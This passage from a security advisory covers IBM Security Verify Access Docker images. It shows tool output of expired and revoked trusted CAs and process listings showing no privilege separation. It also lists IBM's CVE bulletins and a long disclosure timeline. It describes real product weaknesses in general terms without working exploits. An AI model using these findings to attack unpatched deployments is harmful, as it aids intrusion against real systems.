(https://xerces.apache.org/xerces-c/secadv.html). \n\n\n\n## Details - Outdated and untrusted CAs used in the Docker images\n\nIt was observed that the Docker images will trust invalid Certificate Authorities (CA). \n\nUsing the Paranoia program, we can list the invalid, expired and revoked CAs that are trusted inside the 4 Docker images. \n\nIt appears that these 4 Docker images trust some invalid, revoked or untrusted CAs. \n\nResults for ibmcom/verify-access:10.0.4.0:\n\n\u003cpre\u003e\nkali-docker# paranoia inspect ibmcom/verify-access:10.0.4.0\nCertificate CN=VeriSign Class 3 Public Primary Certification Authority - G5,OU=VeriSign Trust Network+OU=(c) 2006 VeriSign\\, Inc. - For authorized use only,O=VeriSign\\, Inc.,C=US\n removed from Mozilla trust store, no reason given\n\nCertificate CN=DigiCert ECC Secure Server CA,O=DigiCert Inc,C=US\n expires soon ( expires on 2023-03-08T12:00:00Z, 19 weeks 2 days until expiry)\n\nCertificate CN=Test CA,O=genua mbh\n expired ( expired on 2014-10-23T08:22:40Z, 8 years 3 days since expiry)\n\nCertificate CN=Cybertrust Global Root,O=Cybertrust\\, Inc\n expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)\n removed from Mozilla trust store, comments: June 2015: DigiCert acquired this root cert from Verizon. \n\nCertificate CN=DST Root CA X3,O=Digital Signature Trust Co. \n expired ( expired on 2021-09-30T14:01:15Z, 1 year 3 weeks since expiry)\n removed from Mozilla trust store, no reason given\n\nCertificate CN=E-Tugra Certification Authority,OU=E-Tugra Sertifikasyon Merkezi,O=E-Tua EBG Bilim Teknolojileri ve Hizmetleri A.,L=Ankara,C=TR\n expires soon ( expires on 2023-03-03T12:09:48Z, 18 weeks 4 days until expiry)\n\nCertificate CN=GlobalSign,OU=GlobalSign Root CA - R2,O=GlobalSign\n expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)\n removed from Mozilla trust store, comments: Ownership transferred to GTS:\nhttps://bug1325532.bmoattachments.org/attachment.cgi?id=8844281\n\nCertificate CN=Hellenic Academic and Research Institutions RootCA 2011,O=Hellenic Academic and Research Institutions Cert. Authority,C=GR\n removed from Mozilla trust store, no reason given\n\nCertificate CN=Staat der Nederlanden EV Root CA,O=Staat der Nederlanden,C=NL\n expires soon ( expires on 2022-12-08T11:10:28Z, 6 weeks 3 days until expiry)\n\nCertificate CN=Global Chambersign Root,OU=http://www.chambersign.org,O=AC Camerfirma SA CIF A82743287,C=EU\n removed from Mozilla trust store, comments: Websites trust bit turned off in NSS 3.35, Firefox 59\nhttps://bugzilla.mozilla.org/show_bug.cgi?id=1410277\n\nCertificate CN=GlobalSign,OU=GlobalSign Root CA - R2,O=GlobalSign\n expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)\n removed from Mozilla trust store, comments: Ownership transferred to GTS:\nhttps://bug1325532.bmoattachments.org/attachment.cgi?id=8844281\n\nCertificate CN=Hellenic Academic and Research Institutions RootCA 2011,O=Hellenic Academic and Research Institutions Cert. Authority,C=GR\n removed from Mozilla trust store, no reason given\n\nCertificate CN=Global Chambersign Root,OU=http://www.chambersign.org,O=AC Camerfirma SA CIF A82743287,C=EU\n removed from Mozilla trust store, comments: Websites trust bit turned off in NSS 3.35, Firefox 59\nhttps://bugzilla.mozilla.org/show_bug.cgi?id=1410277\n\nCertificate CN=Cybertrust Global Root,O=Cybertrust\\, Inc\n expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)\n removed from Mozilla trust store, comments: June 2015: DigiCert acquired this root cert from Verizon. \n\nCertificate CN=DST Root CA X3,O=Digital Signature Trust Co. \n expired ( expired on 2021-09-30T14:01:15Z, 1 year 3 weeks since expiry)\n removed from Mozilla trust store, no reason given\n\nCertificate CN=E-Tugra Certification Authority,OU=E-Tugra Sertifikasyon Merkezi,O=E-Tua EBG Bilim Teknolojileri ve Hizmetleri A.,L=Ankara,C=TR\n expires soon ( expires on 2023-03-03T12:09:48Z, 18 weeks 4 days until expiry)\n\nCertificate CN=DigiNotar PKIoverheid CA Organisatie - G2,O=DigiNotar B.V.,C=NL\n expired ( expired on 2020-03-23T09:50:05Z, 2 years 30 weeks since expiry)\n\nCertificate CN=GlobalSign,OU=GlobalSign Root CA - R2,O=GlobalSign\n expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)\n removed from Mozilla trust store, comments: Ownership transferred to GTS:\nhttps://bug1325532.bmoattachments.org/attachment.cgi?id=8844281\n\nCertificate CN=Hellenic Academic and Research Institutions RootCA 2011,O=Hellenic Academic and Research Institutions Cert. Authority,C=GR\n removed from Mozilla trust store, no reason given\n\nCertificate CN=Staat der Nederlanden EV Root CA,O=Staat der Nederlanden,C=NL\n expires soon ( expires on 2022-12-08T11:10:28Z, 6 weeks 3 days until expiry)\n\nCertificate CN=sks-keyservers.net CA,O=sks-keyservers.net CA,ST=Oslo,C=NO\n expired ( expired on 2022-10-07T00:33:37Z, 2 weeks 3 days since expiry)\n\nFound 395 certificates total, of which 21 had issues\n\u003c/pre\u003e\n\n\n\nResults for:\n\n- - ibmcom/verify-access-runtime:10.0.4.0\n- - ibmcom/verify-access-wrp:10.0.4.0 \n- - ibmcom/verify-access-dsc:10.0.4.0\n\n\u003cpre\u003e\nkali-docker# paranoia inspect ibmcom/verify-access-runtime:10.0.4.0\nCertificate CN=Cybertrust Global Root,O=Cybertrust\\, Inc\nexpired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)\n removed from Mozilla trust store, comments: June 2015: DigiCert acquired this root cert from Verizon. \n\nCertificate CN=DST Root CA X3,O=Digital Signature Trust Co. \nexpired ( expired on 2021-09-30T14:01:15Z, 1 year 3 weeks since expiry)\n removed from Mozilla trust store, no reason given\n\nCertificate CN=E-Tugra Certification Authority,OU=E-Tugra Sertifikasyon Merkezi,O=E-Tua EBG Bilim Teknolojileri ve Hizmetleri A.,L=Ankara,C=TR\n expires soon ( expires on 2023-03-03T12:09:48Z, 18 weeks 4 days until expiry)\n\nCertificate CN=GlobalSign,OU=GlobalSign Root CA - R2,O=GlobalSign\nexpired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)\n removed from Mozilla trust store, comments: Ownership transferred to GTS:\nhttps://bug1325532.bmoattachments.org/attachment.cgi?id=8844281\n\nCertificate CN=Hellenic Academic and Research Institutions RootCA 2011,O=Hellenic Academic and Research Institutions Cert. Authority,C=GR\n removed from Mozilla trust store, no reason given\n\nCertificate CN=Staat der Nederlanden EV Root CA,O=Staat der Nederlanden,C=NL\n expires soon ( expires on 2022-12-08T11:10:28Z, 6 weeks 3 days until expiry)\n\nCertificate CN=Global Chambersign Root,OU=http://www.chambersign.org,O=AC Camerfirma SA CIF A82743287,C=EU\n removed from Mozilla trust store, comments: Websites trust bit turned off in NSS 3.35, Firefox 59\n\nhttps://bugzilla.mozilla.org/show_bug.cgi?id=1410277\nCertificate CN=GlobalSign,OU=GlobalSign Root CA - R2,O=GlobalSign\nexpired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)\n removed from Mozilla trust store, comments: Ownership transferred to GTS:\nhttps://bug1325532.bmoattachments.org/attachment.cgi?id=8844281\n\nCertificate CN=Hellenic Academic and Research Institutions RootCA 2011,O=Hellenic Academic and Research Institutions Cert. Authority,C=GR\n removed from Mozilla trust store, no reason given\n\nCertificate CN=Global Chambersign Root,OU=http://www.chambersign.org,O=AC Camerfirma SA CIF A82743287,C=EU\n removed from Mozilla trust store, comments: Websites trust bit turned off in NSS 3.35, Firefox 59\n\nhttps://bugzilla.mozilla.org/show_bug.cgi?id=1410277\nCertificate CN=Cybertrust Global Root,O=Cybertrust\\, Inc\nexpired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)\n removed from Mozilla trust store, comments: June 2015: DigiCert acquired this root cert from Verizon. \n\nCertificate CN=DST Root CA X3,O=Digital Signature Trust Co. \nexpired ( expired on 2021-09-30T14:01:15Z, 1 year 3 weeks since expiry)\n removed from Mozilla trust store, no reason given\n\nCertificate CN=E-Tugra Certification Authority,OU=E-Tugra Sertifikasyon Merkezi,O=E-Tua EBG Bilim Teknolojileri ve Hizmetleri A.,L=Ankara,C=TR\n expires soon ( expires on 2023-03-03T12:09:48Z, 18 weeks 4 days until expiry)\n\nCertificate CN=DigiNotar PKIoverheid CA Organisatie - G2,O=DigiNotar B.V.,C=NL\n expired ( expired on 2020-03-23T09:50:05Z, 2 years 30 weeks since expiry)\n\nCertificate CN=GlobalSign,OU=GlobalSign Root CA - R2,O=GlobalSign\nexpired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)\n removed from Mozilla trust store, comments: Ownership transferred to GTS:\nhttps://bug1325532.bmoattachments.org/attachment.cgi?id=8844281\n\nCertificate CN=Hellenic Academic and Research Institutions RootCA 2011,O=Hellenic Academic and Research Institutions Cert. Authority,C=GR\n removed from Mozilla trust store, no reason given\n\nCertificate CN=Staat der Nederlanden EV Root CA,O=Staat der Nederlanden,C=NL\n expires soon ( expires on 2022-12-08T11:10:28Z, 6 weeks 3 days until expiry)\n\nCertificate CN=sks-keyservers.net CA,O=sks-keyservers.net CA,ST=Oslo,C=NO\n expired ( expired on 2022-10-07T00:33:37Z, 2 weeks 3 days since expiry)\n\nFound 374 certificates total, of which 18 had issues\n\u003c/pre\u003e\n\nThe communications used in the ISVA platform use SSL/TLS with a trust entirely based on underlying CAs. Some CAs have been revoked and cannot be trusted anymore. \n\nThe presence of revoked and expired CAs also shows that the security of the Docker images is highly perfectible. \n\n\n\n## Details - Lack of privilege separation in Docker instances\n\nIt was observed that the Docker images do not implement privilege separation. Privilege separation is a software-based implementation of the principle of least privilege. \n\nUsing dynamic analysis, the ibmcom/verify-access-wrp:10.0.4.0 Docker image,  ibmcom/verify-access:10.0.4.0 Docker image, and the ibmcom/verify-access-runtime Docker image do not correctly implement privilege separation. \n\nProcesses running inside the ibmcom/verify-access:10.0.4.0 Docker image:\n\n    USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND\n    isam           1  0.0  0.0  12060  2812 ?        Ss   Oct21   0:00 /bin/sh /sbin/bootstrap.sh\n    isam         312  0.0  0.0  24532    56 ?        Ss   Oct21   0:00 /usr/sbin/mesa_crashd\n    isam         314  0.1  0.0  24568  2056 ?        R    Oct21   6:20 /usr/sbin/mesa_crashd\n    isam         318  0.0  0.0  69160  2732 ?        Ss   Oct21   0:00 /usr/sbin/mesa_syslogd\n    isam         322  0.0  0.0  69224  2164 ?        S    Oct21   0:02 /usr/sbin/mesa_syslogd\n    isam         399  0.0  0.0 102760  2740 ?        Ss   Oct21   0:00 /usr/sbin/mesa_eventsd -m 1000\n    isam         400  0.0  0.1 711216  8276 ?        Sl   Oct21   0:00 /usr/sbin/mesa_eventsd -m 1000\n    isam         747  0.0  0.0 270992  7452 ?        Ssl  Oct21   0:06 /usr/sbin/wga_watchdogd slapdw -log_file /var/application.logs.local/verify_access_runtime/user_registry/msg__user_registry.log /usr/sbin/slapd -d 0 -s 0 -h ldap://127.0.0.1:389 ldaps://127.0.0.1:636 -f /etc/openldap/slapd.conf -u ldap -g ldap \n    isam         756  0.0  0.0 271124  7308 ?        Ssl  Oct21   0:06 /usr/sbin/wga_watchdogd ISAM-Policy-Server -log_file /var/application.logs.local/verify_access_runtime/policy/msg__pdmgrd.log -cfg /var/PolicyDirector/etc/ivmgrd.conf /opt/PolicyDirector/bin/pdmgrd -foreground\n    isam         807  0.0  0.0  71488  3084 ?        Ss   Oct21   0:00 /usr/sbin/iss-lum\n    isam         808  0.0  0.5 343920 42140 ?        Sl   Oct21   0:00 /usr/sbin/iss-lum\n    isam         833  0.0  0.0 128400  5140 ?        Ssl  Oct21   0:00 /usr/sbin/rsyslogd\n    isam         873  0.0  0.0 273920  7080 ?        Ssl  Oct21   0:06 /usr/sbin/wga_watchdogd wga_notifications -log_file /var/log/wga_notifications.log wga_notifications -foreground\n    isam         879  1.5  0.5 563872 42292 ?        Sl   Oct21  71:40 wga_notifications -foreground\n    isam         892  0.0  0.0  12060  1804 ?        S    Oct21   0:00 /bin/sh /sbin/bootstrap.sh\n    isam         895  0.0  0.0  23068  1256 ?        S    Oct21   0:00 /usr/bin/coreutils --coreutils-prog-shebang=tail /usr/bin/tail -F -n+0 /var/application.logs.local/lmi/messages.log\n    isam      573957  0.0  0.0  47620  3696 pts/0    Rs+  16:53   0:00 ps -aux\n    isam      573963  0.0  0.0  11928  2852 ?        S    16:53   0:00 sh -c ls /var/support/core_*.* | wc -l\n    \n    pgresql      434  0.0  0.2 188380 17492 ?        Ss   Oct21   0:06 /usr/bin/postgres -D /var/postgresql/config/data\n    pgresql      435  0.0  0.0 138892  2960 ?        Ss   Oct21   0:00 postgres: logger\n    pgresql      446  0.0  0.0 188380  2696 ?        Ss   Oct21   0:00 postgres: checkpointer\n    pgresql      447  0.0  0.0 188516  4676 ?        Ss   Oct21   0:03 postgres: background writer\n    pgresql      448  0.0  0.0 188380  5148 ?        Ss   Oct21   0:03 postgres: walwriter\n    pgresql      449  0.0  0.0 189112  5312 ?        Ss   Oct21   0:04 postgres: autovacuum launcher\n    pgresql      450  0.0  0.0 139024  3016 ?        Ss   Oct21   0:15 postgres: stats collector\n    pgresql      451  0.0  0.0 188916  5492 ?        Ss   Oct21   0:00 postgres: logical replication launcher\n    \n    www-data     547  0.3  6.2 4925056 499744 ?      SLl  Oct21  18:57 /opt/java/jre/bin/java -javaagent:/opt/IBM/wlp/bin/tools/ws-javaagent.jar -Djava.awt.headless=true -Djdk.attach.allowAttachSelf=true -Dcom.sun.jndi.ldap.object.disableEndpointIdentification=true -Djava.security.properties=/opt/IBM/wlp/usr/servers/de\n    \n    ivmgr        761  0.0  0.5 873712 44896 ?        Sl   Oct21   0:04 /opt/PolicyDirector/bin/pdmgrd -foreground\n    ivmgr        863  0.0  0.1 276544  8440 ?        Sl   Oct21   0:00 /usr/sbin/wga_servertaskd\n    \n    ldap         752  0.0 10.3 1314228 822572 ?      Sl   Oct21   0:00 /usr/sbin/slapd -d 0 -s 0 -h ldap://127.0.0.1:389 ldaps://127.0.0.1:636 -f /etc/openldap/slapd.conf -u ldap -g ldap\n    \n    root         813  0.0  0.0  41984  3528 ?        Ss   Oct21   0:01 /usr/sbin/crond\n    root         862  0.0  0.0 174348  2828 ?        Ss   Oct21   0:00 /usr/sbin/wga_servertaskd\n\nSome processes are running as `isam`. For example, the rsyslogd processys runs as `isam`. If a program running as `isam` is compromised inside an instance, then all the programs running as isam are also compromised. \n\nProcesses running inside the ibmcom/verify-access-wrp:10.0.4.0 Docker image:\n\n    PID   USER     TIME  COMMAND\n        1 isam      9:42 /opt/pdweb/bin/webseald -foreground -noenv -config etc/webseald-login-internal.conf\n       32 isam      0:02 slapd -4 -f /etc/openldap/slapd.conf -h ldap://127.0.0.1:6389 -s 0\n\nThe only 2 processes are running as `isam`. \n\n\nProcesses running inside the ibmcom/verify-access-runtime: 10.0.4.0 Docker image:\n\n    PID   USER     TIME  COMMAND\n        1 isam      1h18 /opt/java/jre/bin/java -javaagent:/opt/ibm/wlp/bin/tools/ws-javaagent.jar -Djava.awt.headless=true -Djdk.attach.allowAttachSelf=true -Dcom.ibm.ws.logging.log.directory=/var/application.logs.local/rtprofile -Xms512m -Xmx2048m -Dcom.sun.security.enableCRLDP=true -Dsun.net.inetaddr.ttl=30 -Dhttps\n       38 isam      0:00 slapd -4 -f /etc/openldap/slapd.conf -h ldap://127.0.0.1:6389 -s 0\n       63 isam      0:04 /usr/bin/postgres -D /var/postgresql/config/data\n       64 isam      0:00 postgres: logger   \n       66 isam      0:00 postgres: checkpointer   \n       67 isam      0:00 postgres: background writer   \n       68 isam      0:00 postgres: walwriter   \n       69 isam      0:01 postgres: autovacuum launcher   \n       70 isam      0:05 postgres: stats collector   \n       71 isam      0:00 postgres: logical replication launcher   \n    37169 isam      0:00 bash\n    37186 isam      0:00 ps -a\n\nIn the `ibmcom/verify-access-runtime` instance, we can confirm the postgres daemon is running. We can also confirm a complete lack of privilege separation: everything is running as isam. \n\nIf a program running as `isam` is compromised inside an instance, then the all the programs running as isam are also compromised. \n\n\n\n## Vendor Response\n\nIBM provided several security bulletins:\n\nSecurity Bulletin: IBM Security Verify Access is vulnerable to multiple Security Vulnerabilities - https://www.ibm.com/support/pages/node/7158790:\n\n- - CVE-2023-38371: IBM Security Access Manager uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. \n- - CVE-2024-35137: IBM Security Access Manager Appliance could allow a local user to possibly elevate their privileges due to sensitive configuration information being exposed. \n- - CVE-2024-35139: IBM Security Verify Access could allow a local user to obtain sensitive information from the container due to incorrect default permissions. \n- - CVE-2023-30998: IBM Security Access Manager Container could allow a local user to obtain root access due to improper access controls. \n- - CVE-2023-30997: IBM Security Access Manager Container could allow a local user to obtain root access due to improper access controls. \n- - CVE-2023-38368: IBM Security Access Manager Container could disclose sensitive information to a local user to do improper permission controls. \n- - CVE-2023-38370: IBM Security Access Manager Container, under certain configurations, could allow a user on the network to install malicious packages. \n\nSecurity Bulletin: Security Vulnerabilities discovered in IBM Security Verify Access - https://www.ibm.com/support/pages/node/7145400:\n\n- - CVE-2024-25027: IBM Security Verify Access could disclose sensitive snapshot information due to missing encryption. \n\nSecurity Bulletin: Multiple Security Vulnerabilities were identified in IBM Security Verify Access - https://www.ibm.com/support/pages/node/7106586:\n\n- - CVE-2023-31003: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.6.1) could allow a local user to obtain root access due to improper access controls. \n- - CVE-2023-31001: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.6.1) temporarily stores sensitive information in files that could be accessed by a local user. \n- - CVE-2023-38267: IBM Security Access Manager Appliance (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.6.1) could allow a local user to obtain sensitive configuration information. \n- - CVE-2023-31005: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) could allow a local user to escalate their privileges due to an improper security configuration. \n- - CVE-2023-30999: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) could allow an attacker to cause a denial of service due to uncontrolled resource consumption. \n- - CVE-2023-43016: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) could allow a remote user to log into the server due to a user account with an empty password. \n- - CVE-2023-32327: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. \n- - CVE-2023-32329: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) could allow a user to download files from an incorrect repository due to improper file validation. \n- - CVE-2023-31004: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) could allow a remote attacker to gain access to the underlying system using man in the middle techniques. \n- - CVE-2023-31006: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) is vulnerable to a denial of service attacks on the DSC server. \n- - CVE-2023-32328: IBM Security Verify Access 10.0.0.0 through 10.0.6.1 uses insecure protocols in some instances that could allow an attacker on the network to take control of the server. \n- - CVE-2023-32330: IBM Security Verify Access 10.0.0.0 through 10.0.6.1 uses insecure calls that could allow an attacker on the network to take control of the server. \n- - CVE-2023-43017: IBM Security Verify Access 10.0.0.0 through 10.0.6.1 could allow a privileged user to install a configuration file that could allow remote access. \n- - CVE-2023-31002: IBM Security Access Manager Container 10.0.0.0 through 10.0.6.1 temporarily stores sensitive information in files that could be accessed by a local user. \n- - CVE-2023-38369: IBM Security Access Manager Container 10.0.0.0 through 10.0.6.1 does not require that docker images should have strong passwords by default, which makes it easier for attackers to compromise user accounts. \n\nSecurity Bulletin: Multiple Security Vulnerabilities were discovered in IBM Security Verify Access Container (CVE-2024-35140, CVE-2024-35141, CVE-2024-35142) - https://www.ibm.com/support/pages/node/7155356:\n\n- - CVE-2024-35140: IBM Security Verify Access could allow a local user to escalate their privileges due to improper certificate validation. \n- - CVE-2024-35141: IBM Security Verify Access could allow a local user to escalate their privileges due to execution of unnecessary privileges. \n- - CVE-2024-35142: IBM Security Verify Access could allow a local user to escalate their privileges due to execution of unnecessary privileges. \n\n\n\n## Report Timeline\n\n* October 2022: Security assessment performed on IBM Security Verify Access. \n* Feb 12, 2023: A complete report was sent to IBM. \n* Feb 13, 2023: IBM acknowledged the reception of the security assessment and said that scan tools usually report a lot of issues so I have to check the status of detected CVEs by browsing RedHat webpages and create an issue for each CVE. \n* Feb 13, 2023: Replied to IBM saying that the security assessment was not done using a scanner. \n* Feb 14, 2023: Asked for an update. \n* Feb 14, 2023: IBM confirmed that the report was shared with L3 and \"IBM hacking team\". \n* Feb 22, 2023: IBM said they were still assessing the report. \n* Mar 13, 2023: An additional report on ibmsecurity was sent to IBM. \n* Mar 13, 2023: IBM confirmed that the second report was shared with L3 team. \n* Mar 15, 2023: IBM wanted to organize a meeting about the findings. \n* Mar 15, 2023: I replied that I would like to have a written feedback for each reported vulnerability in order to have constructive discussion. \n* Apr 4, 2023: I asked again IBM to confirm the vulnerabilities\n* Apr 5, 2023: IBM shared the analysis (VulnerabilityResponse.xlsx), confirming several vulnerabilities. \n* Apr 11, 2023: I provided my comments (VulnerabilityResponse-comments-Pierre.xlsx) and asked to organize a meeting. \n* Apr 11, 2023: IBM confirmed a meeting is possible. \n* Apr 18, 2023: I asked to organize a meeting on Apr 19, 2023. \n* Apr 18, 2023: IBM confirmed a meeting is possible. \n* Apr 19, 2023: I asked to have a meeting where every party (dev team, support and myself) can be present. \n* Apr 19, 2023: IBM confirmed a meeting would take place on Apr 20, 2023. \n* Apr 20, 2023: Meeting with IBM regarding ISVA. IBM confirmed they would recheck some of the issues and would provide CVEs for the vulnerabilities. \n* Apr 23, 2023: I asked to have a second meeting about ibmsecurity. \n* Apr 23, 2023: IBM confirmed they will organize a meeting on ibmsecurity. \n* Apr 24, 2023: I asked the timeline to get security patches. \n* Apr 24, 2023: IBM confirmed there are no ETA to get security patches. \n* Apr 27, 2023: Meeting with IBM regarding ibmsecurity. IBM confirmed they will fix all the issues. \n* May 10, 2023: I asked for CVE identifiers to track the vulnerabilities. \n* May 11, 2023: IBM said that PSIRT records have been opened and the scoring is in progress. \n* May 15, 2023: I reached IBM because I found a CVE (CVE-2023-25927) and a security bulletin likely corresponding to a vulnerability I reported, thanks to @CVEnew on Twitter: https://www.ibm.com/support/pages/node/6989653. I asked if this was one of the reported vulnerabilities. \n* Jul 7, 2023: IBM said the dev team was still working on the final list of issues and that everything would be fixed in the 10.0.7 release. \n* Jul 10, 2023: I asked when the 10.0.7 release would be available. I asked again more details about the previous advisory. \n* Jul 11, 2023: IBM said that the 10.0.7 release would be published on Dec 23, 2023. Regarding the CVEs, IBM replied they would need to discuss with the dev team. \n* Jul 12, 2023: I asked IBM to confirm if CVE-2023-25927 was one of the reported vulnerabilities. \n* Jul 12, 2023: IBM said that they do not credit security researchers. \n* Jul 13, 2023: I provided several IBM security bulletins where security researchers were credited, e.g. https://www.ibm.com/support/pages/security-bulletin-vulnerabilities-exist-ibm-data-risk-manager-cve-2020-4427-cve-2020-4428-cve-2020-4429-and-cve-2020-4430. \n* Jul 14, 2023: IBM confirmed that they would forward the information to L3 team and asked what I would want to do with this case. \n* Jul 14, 2023: I said that (1) I was still waiting for information about CVE-2023-25927, (2) I did not have any information regarding security patches for ibmsecurity and (3) I asked IBM to provide me with the final list of vulnerabilities that would be patched in the 10.0.7. Since the list of confirmed vulnerabilities was quite long, I wanted to confirm that nothing was missed. \n* Jul 28, 2023: IBM said that they did not know if CVE-2023-25927 is one of the reported vulnerabilities and in any case, it is impossible to edit the security bulletin and give credits. \n* Aug 16, 2023: IBM asked if additional assistance was required [NB: IBM likely wanted to close this ticket while no security patches were published]. \n* Aug 17, 2023: I asked again information about ibmsecurity and CVE-2023-25927. \n* Oct 20, 2023: IBM said they were still analysing the requests (final list of patched vulnerabilties, security patches of ibmsecurity and status of CVE-2023-25927). \n* Oct 25, 2023: IBM asked to organize a meeting. \n* Oct 25, 2023: I replied that I was still waiting for the final list of vulnerabilities that would be fixed in version 10.0.7. There was also no information regarding security patches for ibmsecurity. \n* Oct 25, 2023: IBM replied they wanted to discuss about the vulnerabilities in a meeting. \n* Oct 29, 2023: IBM asked to organize a meeting again. \n* Oct 30, 2023: I accepted the meeting and I asked IBM to provide the list of vulnerabilities that would be patched with their current status. I also asked the status of ibmsecurity. \n* Oct 30, 2023: IBM asked to have a meeting on Nov 7, 2023. \n* Nov 2, 2023: I confirmed my presence to the meeting. \n* Nov 5, 2023: IBM confirmed the meeting. \n* Nov 7, 2023: Meeting with IBM. IBM provided me with a new report containing new feedbacks for several vulnerabilities. Also IBM confirmed that several vulnerabilities would be patched in 2024 and ibmsecurity would be patched in December 2023. IBM asked me to review a specific vulnerability that appears to be invalid (_V-[REDACTED] - Insecure SSLv3 connections to the DSC servers_). \n* Nov 21, 2023: IBM asked me to review the new report shared by IBM. \n* Nov 28, 2023: IBM asked for updates. \n* Dec 4, 2023: I answered that I did not have anymore access to the test infrastructure and IBM had to wait for my analysis until I get again access to the test infrastructure. \n* Dec 4, 2023: IBM asked me to check the vulnerabilities as soon as possible. \n* Dec 21, 2023: I got access to a test infrastructure and reviewed some vulnerabilities. \n* Dec 21, 2023: I sent a new analysis to IBM, containing details of 4 vulnerabilities. \n* Dec 27, 2023: IBM confirmed the reception of the new analysis. \n* Jan 15, 2024: IBM asked me to update ISVA and recheck all the vulnerabilities. \n* Jan 16, 2024: I asked IBM if ibmsecurity was also patched. \n* Jan 16, 2024: IBM confirmed that a new case must be opened for ibmsecurity to get security patches(!). \n* Jan 22, 2024: IBM wanted to organize a new meeting. \n* Jan 22, 2024: I replied that I failed to understand the issue with the ibmsecurity library and that I had a written confirmation by IBM that security patches would be provided. The vulnerabilities found in ibmsecurity were reported in March 2023 (10 months ago). \n* Jan 22, 2024: I informed IBM that I discovered(!) a new security bulletin thanks to @CVEnew: https://www.ibm.com/support/pages/node/7106586, but only 15 vulnerabilities were listed instead of the 35 vulnerabilities confirmed by IBM. I asked IBM to clarify the situation as it looked like less than half of vulnerabilities were indeed patched. \n* Jan 24, 2024: IBM created a new case for ibmsecurity. \n* Jan 29, 2024: IBM confirmed that 5 vulnerabilities had not been patched in the latest version (10.0.7). \n* Jan 29, 2024: I reached IBM to get the status of 15 unpatched vulnerabilities. I provided the updated analysis to IBM. \n* Feb 7, 2024: IBM confirmed that some of the vulnerabilities were \"being processed\" and that some of vulnerabilities had been also silently patched and no security bulletins had been published. \n* Feb 20, 2024: IBM asked for updates. \n* Feb 20, 2024: I asked when would be the release date for ISVA 10.0.8 and the complete list of vulnerabilities that would be patched in this release. \n* Feb 20, 2024: IBM confirmed that the 10.0.8 release would be published in mid-2024. \n* Feb 23, 2024: I sent a new vulnerability to IBM \"Authentication Bypass on IBM Security Verify Runtime\". \n* Feb 23, 2024: IBM confirmed the reception of the vulnerability and asked to close the ticket. \n* Feb 23, 2024: I said that since some vulnerabilities had not been patched, the ticket must stay open. \n* Feb 23, 2024: IBM said that they cannot keep the ticket open and they needed to close it. \n* Feb 23, 2024: I explained that the vulnerabilities were reported over a year ago and IBM confirmed they had not fully fixed in the latest version and that some vulnerabilities were also still under evaluation. I said that I would agree to close this ticket if IBM could confirm that all vulnerabilities reported in the ticket had been correctly fixed in the latest version. I also asked IBM to provide the corresponding security bulletins. \n* Feb 27, 2024: Regarding the authentication bypass, IBM replied that the runtime was supposed to be in the intranet zone. \n* Feb 28, 2024: I asked IBM to clarify where in the documentation specified that the runtime should not be exposed. For example, in https://www.ibm.com/docs/en/sva/10.0.7?topic=support-docker-image-verify-access-runtime, it was not explained that exposing this runtime on the network was a high security risk. \n* Mar 4, 2024: Regarding the vulnerabilities found in ibmsecurity, IBM said that any security vulnerability found in ibmsecurity must be reported by opening an issue in the Github repository. \n* Mar 8, 2024: IBM confirmed they were able to reproduce the authentication bypass vulnerability. \n* Mar 12, 2024: IBM confirmed they would add an optional MTLS authentication in the next release (10.0.8) and they would update the ISVA documentation to block any attempt of the authentication bypass vulnerability. \n* Mar 29, 2024: IBM published a new security bulletin: https://www.ibm.com/support/pages/node/7145400. \n* Mar 29, 2024: IBM confirmed that any security vulnerability found in ibmsecurity must be reported by opening an issue in the Github repository. \n* Apr 1, 2024: Creation of https://github.com/IBM-Security/ibmsecurity/issues/416. \n* Apr 2, 2024: IBM confirmed the reception of the report https://github.com/IBM-Security/ibmsecurity/issues/416#issuecomment-2032110397. \n* Apr 3, 2024: https://github.com/IBM-Security/ibmsecurity/issues/416 was entirely redacted by IBM. \n* Apr 5, 2024: I asked if the vulnerabilities would be patched in the #416 issue (https://github.com/IBM-Security/ibmsecurity/issues/416). \n* Apr 6, 2024: Issue #416 (https://github.com/IBM-Security/ibmsecurity/issues/416) closed. \n* Apr 6, 2024: I added again the content of https://github.com/IBM-Security/ibmsecurity/issues/416 and asked if CVEs would be published. \n* Apr 10, 2024: 